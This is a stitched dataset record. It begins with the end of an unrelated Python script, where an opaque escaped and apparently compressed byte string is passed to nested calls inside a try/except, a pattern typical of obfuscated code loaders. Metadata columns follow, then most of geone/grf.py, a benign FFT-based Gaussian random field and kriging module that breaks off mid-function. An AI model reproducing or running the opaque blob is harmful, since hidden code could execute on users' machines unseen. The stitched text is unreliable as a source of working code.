/\x84A\xe7*\x9a\x10\xe8\r\x1a\xfbeL\xb2%\xf6\xdf\x96\x048\xa6\x94]]\xd8FV|N44\xd6\x8aD\xae\xbe\xbb$+*7\xf18\x01k\xde)\xab\x94\x1e\x94V\xf3S]\xac\xb0t\xb2\\\xeb.\xc2\x15\xb8Z;\x9b:99<\xe9\xb3\x97}\x12E\x99\xbe\'2\x90P"e\xebS\x97\xa7\x01\xe5\xbe_\x9f\x9cn\xd7{\xfaciw\x0e\xea\xd3fgG\x7fN\xb7\xaev\x8e\xc2\x7f_\xed\xed\x84_\x92:\xaf\xf2\'9y\xef\xb0n}\xfdt\xd0\xba\xe6p\xff\xe8\xc4\x9d\xfa?\x9fM\xdd\xddBGg;\x87\x07\xfaY\x13~Avt\xb2sp\x16\xc0!\'\x14~E\xe1\x7f\xff\xef\x8f\xe15\xbbs\xe6\xe5\xf0}\xbe\xde?l\xcf\xf7\xdc\x98\x08(\xf7?{\xaa\x8b\xa7\xff=\x96~\x8a*\x151s\xa9\x81\x8f\x14\x1e\x1c\x81]A]\x1eg\xb4\xf7_\xe3\xa3\'O\x9e\xfc\x9f\xe3\xbb\xef\xbb\xff\x10}\xf5i\x9f}\xc9w\xfe\xb8{x\xff5_\xdb\xdb\xbe\x87O\xfe\x07\'\xd15FqS\x01\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 9,717.916667
| 116,449
| 0.734408
| 26,740
| 116,615
| 3.197046
| 0.194764
| 0.000421
| 0.000211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230032
| 0.001646
| 116,615
| 11
| 116,450
| 10,601.363636
| 0.504265
| 0.000472
| 0
| 0
| 0
| 19
| 0.680305
| 0.678503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c9d6b69e9aac71a6f7a1f884a2f094a03e63dd2
| 155,550
|
py
|
Python
|
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
geone/grf.py
|
pjuda/geone
|
5a9e5d99702cdccb11ab825ea9b4caa90f3ba111
|
[
"BSD-4-Clause-UC"
] | null | null | null |
#!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
Python module: 'grf.py'
author: Julien Straubhaar
date: jan-2018
Module for gaussian random fields (GRF) simulations in 1D, 2D and 3D,
based on Fast Fourier Transform (FFT).
"""
import numpy as np
# from geone import covModel as gcm # not necessary
# ----------------------------------------------------------------------------
def extension_min(r, n, s=1.):
"""
Compute extension of the dimension in a direction so that a GRF reproduces
the covariance model appropriately:
:param r: (float) range (max) along the considered direction
:param n: (int) dimension (number of cells) in the considered direction
:param s: (float) cell size in the considered direction
:return: (int) appropriate extension in number of cells
"""
k = int(np.ceil(r/s))
return max(k-n, 0) + k - 1
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf1D(cov_model, dimension, spacing, origin=0.,
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 1D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (1-dimensional array or float) are 1D-lag(s)
(CovModel1D class) covariance model in 1D, see
definition of the class in module geone.covModel
:param dimension: (int) nx, number of cells
:param spacing: (float) dx, spacing between two adjacent cells
:param origin: (float) ox, origin of the 1D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx values (reshaped if needed)
:param x: (1-dimensional array or float or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (same type as x)
:param extensionMin: (int) minimal extension in nodes for embedding (see above)
None for default (automatically computed, based
on the range if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B:
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (2-dimensional array of dim nreal x n) nreal GRFs
with n = nx if crop = True, and n >= nx otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of a vector x of length N is given by
c = DFT(x) = F * x
where F is the N x N matrix with coefficients
F(j,k) = [exp(-i*2*pi*j*k/N)], 0 <= j,k <= N-1
We have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft() = DFT
numpy.fft.ifft() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel1D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF1D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF1D: Preliminary computation...')
#### Preliminary computation ####
nx = dimension
dx = spacing
# ox = origin
if method not in (1, 2, 3):
print('ERROR (GRF1D): invalid method')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF1D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size not in (1, nx):
print('ERROR (GRF1D): number of entry for "mean"...')
return
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size not in (1, nx):
print('ERROR (GRF1D): number of entry for "var"...')
return
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF1D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF1D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF1D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = extension_min(cov_model.r(), nx, s=dx)
else:
# ... based on dimension
extensionMin = dimension - 1
Nmin = nx + extensionMin
if printInfo:
print('GRF1D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a circulant matrix of size N x N, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N = 2^g (a power of 2), with N >= Nmin
g = int(np.ceil(np.log2(Nmin)))
N = int(2**g)
if printInfo:
print('GRF1D: Embedding dimension: {}'.format(N))
# ccirc: coefficient of the embedding matrix (first line), vector of size N
L = int (N/2)
h = np.arange(-L, L, dtype=float) * dx # [-L ... 0 ... L-1] * dx
ccirc = cov_func(h)
del(h)
# ...shift first L index to the end of the axis, i.e.:
# [-L ... 0 ... L-1] -> [0 ... L-1 -L ... -1]
ind = np.arange(L)
ccirc = ccirc[np.hstack((ind+L, ind))]
del(ind)
if printInfo:
print('GRF1D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The DFT coefficients
# lam = DFT(ccirc) = (lam(0),lam(1),...,lam(N-1))
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k) = lam(N-k), k=1,...,N-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(0.))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF1D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF1D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int)
if sum(indc < 0) > 0 or sum(indc >= nx):
print('ERROR (GRF1D): a conditioning point is out of the grid')
return
if len(np.unique(indc)) != len(x):
print('ERROR (GRF1D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(indc[j]-indc[i], N)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF1D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nx), indc), dtype=int)
nnc = len(indnc)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF1D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
k = np.mod(indc[j] - indnc, N)
rBA[:,j] = ccirc[k]
if printInfo:
print('GRF1D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate[indnc] * np.transpose(1./varUpdate[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF1D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = indc
indncEmb = indnc
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (1D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# 1. Assuming N=2L even, generate
# V1 = (V1(1),...,V1(L-1)) ~ 1/sqrt(2) N(0, 1)
# V2 = (V2(1),...,V2(L-1)) ~ 1/sqrt(2) N(0, 1)
# and set
# X = (X(0),...,X(N-1)) on G
# with
# X(0) ~ N(0,1)
# X(L) ~ N(0,1)
# and
# X(k) = V1(k) + i V2(k)
# X(N-k) = V1(k) - i V2(k)
# for k = 1,...,L-1
# 2. Compute Z = Q^(*) D * X
# [OR: Z = Q D * X], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * X)
# [OR: Z = 1/N^(1/2) * DFT(D * X]
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (1D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx = nx
else:
grfNx = N
grf = np.zeros((nreal, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=N)
Z = np.fft.ifft(lamSqrt * np.fft.fft(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNx])
elif method == 2:
# Method B
# --------
for i in range(nreal):
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
X1 = np.zeros(N)
X2 = np.zeros(N)
X1[[0,L]] = np.random.normal(size=2)
X1[range(1,L)] = 1./np.sqrt(2) * np.random.normal(size=L-1)
X1[list(reversed(range(L+1,N)))] = X1[range(1,L)]
X2[range(1,L)] = 1./np.sqrt(2) * np.random.normal(size=L-1)
X2[list(reversed(range(L+1,N)))] = - X2[range(1,L)]
X = np.array(X1, dtype=complex)
X.imag = X2
Z = np.sqrt(N) * np.fft.ifft(lamSqrt * X)
grf[i] = np.real(Z[0:grfNx])
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF1D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=N), dtype=complex)
W.imag = np.random.normal(size=N)
Z = np.sqrt(N) * np.fft.ifft(lamSqrt * W)
# Z = 1/sqrt(N) * np.fft.fft(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNx])
grf[i+1] = np.imag(Z[0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=N)
Z = np.fft.ifft(lamSqrt * np.fft.fft(W))
grf[nreal-1] = np.real(Z[0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF1D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N)
for i in range(nreal):
if printInfo:
print('GRF1D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifft(lam * np.fft.fft(rAAinvResiduEmb))
# ...note that Im(Z) = 0
Z = np.real(Z[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige1D(x, v, cov_model, dimension, spacing, origin=0.,
mean=0, var=None,
extensionMin=None,
conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
measureErrVar=0., tolInvKappa=1.e-10,
computeKrigSD=True,
printInfo=True):
"""
Computes kriging estimates and standard deviation in 1D via FFT.
It is a simple kriging
- of value v at location x,
- based on the covariance model / function,
- with a specified mean (mean) and variance (var), which can be non stationary
Notes:
1) For reproducing covariance model, the dimension of the field/domain should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large data set:
- conditioningMethod should be set to 2 for using FFT
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix (solving linear system)
:param x: (1-dimensional array of float) coordinate of data points
:param v: (1-dimensional array of float) value at data points
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (1-dimensional array or float) are 1D-lag(s)
(CovModel1D class) covariance model in 1D, see
definition of the class in module geone.covModel
:param dimension: (int) nx, number of cells
:param spacing: (float) dx, spacing between two adjacent cells
:param origin: (float) ox, origin of the 1D field
- used for localizing the conditioning points
:param mean: (float or ndarray) mean of the variable:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx values (reshaped if needed)
:param var: (float or ndarray or None) variance of the variable,
if not None: variance in the field is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx values (reshaped if needed)
:param extensionMin: (int) minimal extension in nodes for embedding (see above)
None for default (automatically computed, based
on the range if covariance model class is given
as third argument)
:param conditioningMethod:
(int) indicates which method is used to perform kriging.
Let
A: index of conditioning (data) nodes
B: index of non-conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, thre kriging estimates and variance are
krig[B] = mean + rBA * rAA^(-1) * (v - mean)
krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
The computation is done in a way depending on the
following possible values for conditioningMethod:
1: method CondtioningA:
the matrices rBA, RAA^(-1) are explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for kriging estimates:
the linear system
rAA * y = (v - mean)
is solved, and then
mean + rBA*y
is computed
for kriging variances:
for each column u[j] of rAB, the linear
system
rAA * y = u[j]
is solved, and then
rBB[j,j] - y^t*y
is computed
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
:param tolInvKappa: (float >0) the function is stopped if the inverse of
the condition number of rAA is above tolInvKappa
:param computeKrigSD:
(bool) indicates if the standard deviation of kriging is computed
:param printInfo: (bool) indicates if some info is printed in stdout
:return ret: two possible cases:
ret = [krig, krigSD] if computeKrigSD is equal to True
ret = krig if computeKrigSD is equal to False
where
krig: (1-dimensional array of dim nx)
kriging estimates
krigSD: (1-dimensional array of dim nx)
kriging standard deviation
NOTES:
Discrete Fourier Transform (DFT) of a vector x of length N is given by
c = DFT(x) = F * x
where F is the N x N matrix with coefficients
F(j,k) = [exp(-i*2*pi*j*k/N)], 0 <= j,k <= N-1
We have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft() = DFT
numpy.fft.ifft() = DFT^(-1)
"""
# Check third argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel1D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (third argument) is not valid")
return
# Check conditioning method
if conditioningMethod not in (1, 2):
print('ERROR (KRIGE1D): invalid method!')
return
nx = dimension
dx = spacing
# ox = origin
x = np.asarray(x).reshape(-1) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size not in (1, nx):
print('ERROR (KRIGE1D): number of entry for "mean"...')
return
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size not in (1, nx):
print('ERROR (KRIGE1D): number of entry for "var"...')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = extension_min(cov_model.r(), nx, s=dx)
else:
# ... based on dimension
extensionMin = dimension - 1
Nmin = nx + extensionMin
if printInfo:
print('KRIGE1D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a circulant matrix of size N x N, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N = 2^g (a power of 2), with N >= Nmin
g = int(np.ceil(np.log2(Nmin)))
N = int(2**g)
if printInfo:
print('KRIGE1D: Embedding dimension: {}'.format(N))
# ccirc: coefficient of the embedding matrix (first line), vector of size N
L = int (N/2)
h = np.arange(-L, L, dtype=float) * dx # [-L ... 0 ... L-1] * dx
ccirc = cov_func(h)
del(h)
# ...shift first L index to the end of the axis, i.e.:
# [-L ... 0 ... L-1] -> [0 ... L-1 -L ... -1]
ind = np.arange(L)
ccirc = ccirc[np.hstack((ind+L, ind))]
del(ind)
if printInfo:
print('KRIGE1D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The DFT coefficients
# lam = DFT(ccirc) = (lam(0),lam(1),...,lam(N-1))
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k) = lam(N-k), k=1,...,N-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft(ccirc))
# ...note that the imaginary parts are equal to 0
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(0.))
# Kriging
# -------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, the kriging estimates are
# mean + rBA * rAA^(-1) * (v - mean)
# and the kriging standard deviation
# diag(rBB - rBA * rAA^(-1) * rAB)
# Compute the part rAA of the covariance matrix
# Note: if a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# which is accounting in the computation of kriging estimates and standard
# deviation below
if printInfo:
print('KRIGE1D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int)
if sum(indc < 0) > 0 or sum(indc >= nx):
print('ERROR (KRIGE1D): a conditioning point is out of the grid')
return
if len(np.unique(indc)) != len(x):
print('ERROR (KRIGE1D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(indc[j]-indc[i], N)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (KRIGE1D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nx), indc), dtype=int)
nnc = len(indnc)
# Initialize
krig = np.zeros(nx)
if computeKrigSD:
krigSD = np.zeros(nx)
if mean.size == 1:
v = v - mean
else:
v = v - mean[indc]
if var is not None and var.size > 1:
v = 1./varUpdate[indc] * v
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('KRIGE1D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
k = np.mod(indc[j] - indnc, N)
rBA[:,j] = ccirc[k]
del(ccirc)
if printInfo:
print('KRIGE1D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA)
if not computeKrigSD:
del(rBA)
# Compute kriging estimates
if printInfo:
print('KRIGE1D: computing kriging estimates...')
krig[indnc] = np.dot(rBArAAinv, v)
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE1D: computing kriging standard deviation ...')
for j in range(nnc):
krigSD[indnc[j]] = np.dot(rBArAAinv[j,:], rBA[j,:])
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(rBA)
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if not computeKrigSD:
del(ccirc)
if printInfo:
print('KRIGE1D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = indc
indncEmb = indnc
# Compute kriging estimates
if printInfo:
print('KRIGE1D: computing kriging estimates...')
# Compute
# u = rAA^(-1) * v, and then
# Z = rBA * u via the circulant embedding of the covariance matrix
